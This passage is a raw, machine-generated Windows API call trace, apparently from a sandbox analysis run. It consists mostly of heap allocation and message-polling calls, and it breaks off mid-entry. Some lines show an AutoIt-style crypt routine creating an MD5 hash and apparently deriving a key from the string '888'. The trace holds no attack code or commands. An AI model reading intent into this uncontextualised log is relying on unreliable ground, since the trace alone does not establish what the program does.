dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0217.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0217.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0217.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0217.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0217.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0217.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0217.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0217.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0217.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0217.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0217.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0217.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0217.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0217.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0217.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5f8 | out: hHeap=0x970000) returned 1 [0217.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0217.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0217.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0217.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0217.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0217.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0217.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0217.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0217.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0217.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0217.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0217.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0217.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0217.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0217.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0217.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0217.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0217.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0217.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0217.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0217.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0217.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0217.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0217.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0217.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0217.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0217.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0217.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0217.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0217.272] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0217.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0217.273] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0217.273] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0217.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04348 | out: hHeap=0x970000) returned 1 [0217.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0217.273] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0217.273] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0217.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0217.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0217.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f378 | out: hHeap=0x970000) returned 1 [0217.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0217.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6e8 | out: hHeap=0x970000) returned 1 [0217.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0217.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0217.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0217.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0217.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0217.273] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0217.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0217.273] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0217.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0217.273] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0217.273] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0217.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f045e8 | out: hHeap=0x970000) returned 1 [0217.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0217.274] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0217.274] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0217.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0217.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0217.274] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0217.274] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0217.274] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0217.274] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0217.274] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0217.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04118 | out: hHeap=0x970000) returned 1 [0217.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0217.274] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0217.274] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0217.274] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0217.312] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0217.312] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0217.312] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0217.312] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0217.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f558 | out: hHeap=0x970000) returned 1 [0217.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0217.313] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0217.313] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0217.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f046c8 | out: hHeap=0x970000) returned 1 [0217.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0217.313] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0217.313] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0217.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0217.313] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0217.313] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0217.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04230 | out: hHeap=0x970000) returned 1 [0217.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0217.313] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0217.313] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0217.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0217.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0217.313] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0217.313] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0217.313] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0217.315] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0217.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f041c0 | out: hHeap=0x970000) returned 1 [0217.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0217.315] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0217.315] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0217.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f738 | out: hHeap=0x970000) returned 1 [0217.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0217.315] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0217.315] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0217.315] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0217.315] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e51598, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0217.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0217.316] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0217.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0217.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0217.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69bc8 [0217.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0217.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0217.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0217.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0217.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0217.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0217.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0217.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0217.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0217.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0217.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0217.316] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0217.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e564e0 [0217.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0217.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0217.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0217.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0217.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0217.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0217.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0217.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0217.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0217.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0217.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0217.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0217.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0217.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0217.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0217.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0217.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0217.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0217.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0217.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0217.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0217.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0217.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0217.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0217.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0217.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0217.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0217.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0217.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0217.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0217.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0217.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0217.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0217.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0217.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0217.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0217.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0217.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0217.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0217.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0217.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0217.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0217.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0217.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0217.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0217.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0217.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0217.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0217.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0217.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f558 | out: hHeap=0x970000) returned 1 [0217.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0217.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0217.318] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0217.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0217.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0217.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0217.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0217.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0217.319] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0217.319] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0217.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0217.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0217.319] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0217.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0217.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0217.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0217.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0217.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0217.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0217.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0217.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0217.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0217.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0217.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0217.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0217.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0217.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e55038, cbMultiByte=4, 